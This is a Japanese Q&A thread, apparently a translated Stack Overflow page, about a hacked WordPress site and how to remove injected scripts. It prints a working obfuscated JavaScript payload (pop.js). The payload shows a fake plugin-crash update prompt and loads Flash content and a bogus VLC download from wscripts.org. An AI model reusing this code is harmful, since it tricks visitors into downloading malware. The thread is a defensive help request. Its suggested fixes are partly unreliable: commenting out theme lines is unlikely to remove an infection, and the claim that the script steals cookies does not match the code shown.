0

wordpress サイトで次のメッセージが表示されます。

データベース サーバーに接続できませんでした。データベース jimbob_je が見つかりませんでした。アプリケーションで予期しない問題が発生しました。SELECT statscurl_id FROM statscurlWHERE statscurl_ip = '';

すでにsucuri.netを使用して確認しましたが、何も見つかりませんでしたが、まだエラーが発生しています。ブラウザからページ ソースを確認したところ、終了ヘッダー タグの上に暗号化されたスクリプトが 2 つありますが、header.php には見つかりません。

2 つのスクリプトの先頭には「eval(unescape」があり、ページが読み込まれているときにステータス バーにwscripts.orgjquery.comの 2 つのサイトが表示されます。 また、Firebugで読み込まれたスクリプトを調べると、 pop.jsimwb_cab_script という 2 つのサイトがあります。 jsですが、暗号化されておらず、上記のサイトから取得されています。どちらもランダムに読み込まれます。

これはimwb_cab_script.jsのコードです

jQuery(document).ready(function($) {
// $() will work as an alias for jQuery() inside of this function
imwb_activate_cab();
$('.imwb_cabar').live('click', function() {
var data = {
action :'imwb_cab_ctr_action',
barDetails: $(this).attr('id'),
nonce : IMWB_CAB_Ajax.nonce
};
$.ajax({
async: false,
type: 'POST',
url: IMWB_CAB_Ajax.ajaxurl,
data: data
});
imwb_goto_cab_link();
return true;
});
});
var cabCookie = function(name, value, expireHours, path) {
// name and at least value given, set cookie...
if (arguments.length > 1 ) {
if (expireHours === null || expireHours === undefined) {
expireHours = 7;

もう 1 つのコード スクリプトpop.jsは次のとおりです。

var _0xf475=["\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x73\x68\x6F\x77","\x4E","\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x72\x65\x73\x68\x6F\x77","\x72\x61\x6E\x64\x6F\x6D","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x69\x6D\x77\x62\x5F\x63\x61\x62\x61\x72\x22\x20\x69\x64\x3D\x22\x63\x61\x62\x5F\x31\x5F\x30\x22\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x69\x6D\x61\x67\x65\x73\x2F\x77\x61\x72\x6E\x69\x6E\x67\x2E\x67\x69\x66\x22\x3E\x3C\x70\x3E\x4F\x70\x70\x73\x21\x20\x59\x6F\x75\x72\x20\x58\x76\x69\x64\x20\x4D\x65\x64\x69\x61\x20\x50\x6C\x75\x67\x69\x6E\x20\x68\x61\x73\x20\x43\x72\x61\x73\x68\x65\x64\x21\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x30\x30\x30\x30\x66\x66\x3B\x20\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x50\x6C\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x64\x20\x4E\x6F\x77\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x2F\x70\x3E\x3C\x6F\x62\x6A\x65\x63\x74\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x69\x64\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73\x69\x64\x3A\x44\x32\x37\x43\x44\x42\x36\x45\x2D\x41\x45\x36\x44\x2D\x31\x31\x63\x66\x2D\x39\x36\x42\x38\x2D\x34\x34\x34\x35\x35\x33\x35\x34\x30\x30\x30\x30\x22\x3E\x3C\x70\x61\x72\x61\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x6F\x76\x69\x65\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x3E\x3C\x65\x6D\x62\x65\x64\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x20\x6E\x61\x6D\x65\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x74\x79\x70\x65\x3D\x22\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x2D\x66\x6C\x61\x73\x68\x22\x3E\x3C\x2F\x65\x6D\x62\x65\x64\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x2F\x31\x32\x33\x34\x35\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x2D\x76\x6C\x63\x2D\x70\x6C\x61\x79\x65\x72\x2F\x3F\x6D\x6E\x3D\x34\x34\x36\x33\x34\x33\x34\x32\x32\x32\x36","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;

問題は、ブラウザ ページのソースに表示されるこれらのコードを削除する方法です。

ここで暗号化されたスクリプトを見ることができます

これらのコードを取り除く方法に関する他の解決策はありますか?

ありがとう!!!

PD: このサイトはプラグインを使用していません

4

2 に答える 2

0

wordpress.stackexchange.comのトピック「Malware in header.php」を読んで、誰かがwp_head ()のすぐ上のコードを見つけてコードを消去しましたが、これは数時間後に再び現れました。

似たようなものを探しましたが、疑わしいものは何も見つかりませんでした。念のため、wp_head( ) の上の 2 行をこのようにコメントしました

<!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->

その後、サイトを数回リロードしましたが、今では問題ないようです。メッセージが表示されない、ページ ソースを表示するときに暗号化されたスクリプトが表示されない、ロードしようとしている wscripts.org が表示されないなどです。サイトのロードがさらに速くなりました。

私もいくつかの安全な修正を行いました。

また発生したら、お知らせします。

これが同じような状況の誰かに役立つことを願っています。

于 2012-08-12T07:23:55.383 に答える
0

先週似たようなものを手に入れましたが、感染したのは PHP ファイルだけでした.. ヘッダーにあるコードを見せていただけますか?

私はあなたが入れたコードをアンエスケープし、ユーザーの Cookie を盗んで何らかのバナーを表示しようとしているようです。サイトをすぐにシャットダウンし、ページから手動でコードをクリーンアップすることをお勧めします..これよりも古いバージョンの timthumb のテーマは、おそらくセキュリティ ホールです。

まず、このコードがウイルスを訪問者のブラウザにダウンロードしようとしている可能性があるため、一般の訪問者に対して Web サイトを無効にすることです。

そのためには、ルート ディレクトリに .htaccess ファイルを作成するだけです。

<IfModule mod_rewrite.c>
 RewriteEngine on
 RewriteCond %{REMOTE_ADDR} !^192\.168\.0\.100
 RewriteCond %{REQUEST_URI} !/pageisdown.html$ [NC]
 RewriteCond %{REQUEST_URI} !\.(jpe?g?|png|gif) [NC]
 RewriteRule .* /pageisdown.html [R=302,L]
</IfModule>

ここからこれを取得し、 192.168.0.100 行を自分のパブリック IP アドレスに変更すると、自分だけがサイトにアクセスできるようになり、他の人は pageisdown.html ページにリダイレクトされます。(このページを自由に作成して、好きなものを追加してください..)

次に、ファイルを手動でスキャンして、このスクリプトがどこから来ているかを確認する必要があります。通常は、次のような php 関数の形式になります。

eval(base64_decode(....))

ドット (...) は通常、多くの base64 でエンコードされたコードです。その関数呼び出しを削除するだけでクリーンになります!また、バックドア ファイルがないことを確認し、新しく作成された php ファイルやその他のスクリプトがないかサーバーを確認してください。あなたが作成したことを覚えていない..

于 2012-08-11T21:50:15.180 に答える